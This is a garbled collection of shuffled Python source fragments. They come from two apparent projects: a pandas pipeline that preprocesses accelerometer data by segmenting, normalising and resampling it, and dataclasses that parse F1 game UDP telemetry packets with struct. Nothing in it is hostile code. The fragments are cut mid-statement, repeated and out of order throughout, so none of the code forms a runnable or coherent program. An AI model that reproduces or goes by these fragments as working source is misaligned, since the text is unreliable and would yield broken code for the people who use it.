pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for column", "print('Segment by labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments =", "[] for target_label in args: selected_data = data[data[label_column] == target_label] # 2. Split", "os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold = None):", "None: mean = data[columns].mean() std = data[columns].std() data[columns] = (data[columns] - data[columns].mean()) /", "all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None", "mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError, NotImplementedError,", "substract 0.5 else: data = (data - data.min()) / (data.max() - data.min()) #", "# current run @0.95 for classical approach via TS Fresh )[:-1] return data", "and aggregate data segments_combined = None for segment in min_length_subsegements: segment = segment.reset_index()", "isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError,", "reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'pca':", "= config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0],", "is None or target_columns is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "in data.keys() for column in columns): raise 
TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None:", "if mode == 'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column", "data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind],", "isinstance(columns, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise", "data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column]", "args[2] segments_aggregated = [] split = lambda df, chunk_size : numpy.array_split(df, len(df) //", "or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels,", "test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y',", "'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError,", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise 
TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError,", "(data - data.min()) / (data.max() - data.min()) # to center around 0.0 substract", "replacement_mode='del_row') print('Train, Test, Validation split') data_len = data.shape[0] test_len = int(data_len * test_sz)", ":param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any type, used as value", "config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq']", "mean = None, std = None): \"\"\" Apply z-normalization to a data set.", "pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] =", "= self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid", "else: data = (data - mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data,", "len(df) // chunk_size + 1, axis=0) # 1. 
Ensure index is datetime index", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "#Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality", "0.0 substract 0.5 else: data = (data - data.min()) / (data.max() - data.min())", "#Train for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) #", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data): \"\"\" Combines labels", ":param threshold: :return: \"\"\" try: if data is None or replacement_mode is None", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data,", "\"\"\" try: if data is None or mode is None or columns is", "for next 3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self,", "= self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs'", "mode: :param columns: :param 
encoding_function: :return: \"\"\" try: if data is None or", "data, column, unit): \"\"\" Converts unix time stamps to date time. :param data:", "road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] =", "pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate data segments_combined = None for segment", "segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate data segments_combined = None", "unit, label data, remove nans') data = self.convert_unix_to_datetime(data, column = 'time', unit =", "2. Split by non-subsequent indices # Source for next 3 lines after comment:", "data.set_index(old_index) return data if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError," ]
[ "struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get telemetry for each active car", "allocate to position on car (fl, fr, rl, rr). Args: telemetry_values(list): List of", "m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls,", "m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary", "PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format: str, message_type: object,", "unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, ) # Remove header", "List): \"\"\"Parse unpacked struct into class attributes. Args: unpacked (list): Unpacked struct containing", "\"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class", "car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values", "-> dict: \"\"\"Get single attributes from attributes list and allocate to position on", "struct containing all attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[5], unpacked[6],", "all attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3],", "binary_message: str): \"\"\"Create class form binary UDP package. 
Args: binary_message (str): Binary representation", "str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class PacketHeader:", ") @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls, packet_header:", "attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15],", "| _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from", "m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature:", "representation of struct. \"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return", "data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy()", "( self.m_header.__dict__ | player_car_damage.__dict__.copy() ) # Map tyre wear values from list to", "CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8", "cls, packet_header: PacketHeader, binary_message: str, message_format: str, message_type: object, ): \"\"\"Create class form", "m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into", "player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from list to attributes player_telemetry_message = (", "struct. 
\"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22),", "LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player", "i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] =", "package header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return cls( unpacked[0],", "pressure values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"],", "unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index =", "\"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\"", "data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i + 1) * len(message_format)", "m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes.", "+ 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2],", "-> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index]", "@classmethod def from_binary(cls, binary_message: str): \"\"\"Create class form binary UDP package. 
Args: binary_message", "# Map tyre temperature values from list to attributes player_telemetry_message = ( player_telemetry_message", "player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre", "CarTelemetryData class. \"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]),", "unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\"", "unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData:", "\"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ |", "{} for i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) + \"_\" + car_position_mapping[i]", "m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List):", "from dataclasses import dataclass, asdict from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT", "unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes:", "data_list = list() for i in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i *", "| _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map 
tyre inner temperature values", "for car telemetry. Classes parse data from binary format and extract player data.\"\"\"", "temperature values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"],", "\"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def", "ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct", "m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List):", "range(22): data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i + 1) *", "len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def", "unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData]", "ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16]", "* len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls(", "_telemetry_list_to_attributes(telemetry_values: list, attribute_name: str) -> dict: \"\"\"Get single attributes from attributes list and", "m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 
m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls,", "PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header,", "* len(message_format) : (i + 1) * len(message_format) ] ) data_list.append(data) return data_list", "list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]),", "\"\"\"Parse unpacked struct into class attributes. Args: unpacked (list): Unpacked struct containing all", "_telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from list", "Map tyre damage values from list to attributes player_car_damage_message = ( player_car_damage_message |", "each active car car_telemetry_data_list = list() for i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked(", "str): \"\"\"Create class form binary UDP package. Args: binary_message (str): Binary representation of", "CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass", "mapped to attributes. attribute_name(str): Attribute name used as keys in dict. \"\"\" car_position_mapping", "unpacked struct into class attributes. Args: unpacked (list): Unpacked struct containing all attributes", "struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format: str,", "to construct CarTelemetryData class. 
\"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5],", "player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"], \"m_brakesDamage\", ) ) player_car_damage_message.pop(\"m_brakesDamage\") return player_car_damage_message", "(str): Binary representation of package header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string,", "List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args:", "message_type: object, ): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader", "unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args: unpacked (list): Unpacked struct", "PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" lap_data_list = cls.get_message_list( packet_header,", "lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index", "unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get lap data for each active car", "car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict:", "_telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from list", "m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class", "attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], 
\"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") #", "list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod", "class. binary_message (str): Binary representation of struct. \"\"\" # Unpack struct unpacked =", "unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod", "\"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format:", "unpacked[11]]), ) @dataclass class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header:", "len(message_format) : (i + 1) * len(message_format) ] ) data_list.append(data) return data_list @dataclass", "\"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy:", "= list() for i in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format)", "cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index =", "Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get lap data", "UDP package. Args: packet_header (PacketHeader): PacketHeader class. 
binary_message (str): Binary representation of struct.", "values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\",", "\"fr\"] telemetry_values_dict = {} for i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name) +", "unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25],", "(str): Binary representation of struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData", "ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct", "binary format and extract player data.\"\"\" import struct import ctypes from dataclasses import", "packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get", "m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls,", "= message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i + 1) * len(message_format) ]", "unpacked[len(asdict(packet_header)) : :] # Get telemetry for each active car car_telemetry_data_list = list()", "class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str):", "ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8", 
"player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map", "class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader, binary_message:", "struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return cls(packet_header, car_damage_data_list)", "player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ |", "unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index:", "PacketHeader, binary_message: str): \"\"\"Create class form binary UDP package. 
Args: packet_header (PacketHeader): PacketHeader", "PacketHeader, binary_message: str, message_format: str, message_type: object, ): \"\"\"Create class form binary UDP", "unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23],", "header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get lap data for", "m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value:", "m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls,", "( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure", "class. 
\"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class", "List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked:", "player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map", "list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), )", "binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data", "brake temperature values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes(", "struct. 
\"\"\" lap_data_list = cls.get_message_list( packet_header, binary_message, LAP_DATA_FORMAT, LapData ) return cls(packet_header, lap_data_list)", "* 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from struct unpacked_wo_header =", "list, attribute_name: str) -> dict: \"\"\"Get single attributes from attributes list and allocate", "temperature values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"],", "m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into", "list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) )", "list and allocate to position on car (fl, fr, rl, rr). Args: telemetry_values(list):", "@dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list( cls, packet_header: PacketHeader,", "import struct import ctypes from dataclasses import dataclass, asdict from typing import List", "inner temperature values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes(", "= ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres", "get_message_list( cls, packet_header: PacketHeader, binary_message: str, message_format: str, message_type: object, ): \"\"\"Create class", "( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return 
player_telemetry_message @dataclass", "packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader):", "= ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake", "= self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre temperature", "attributes to construct CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4],", "self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float", "m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK: ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod", "in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i + 1)", "ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8", "m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8 m_rev_lights_percent: ctypes.c_uint8 m_rev_lights_bit_value: ctypes.c_uint16 m_brakes_temperature: List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature:", "= \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT = \"BBBBBfffHHBBHBBBbfBfffB\" CAR_DAMAGE_DATA_FORMAT = \"ffffBBBBBBBBBBBBBBBBBBBBBBB\" def _telemetry_list_to_attributes(telemetry_values: list, attribute_name: str)", "m_surface_type: List[ctypes.c_uint8] @classmethod def 
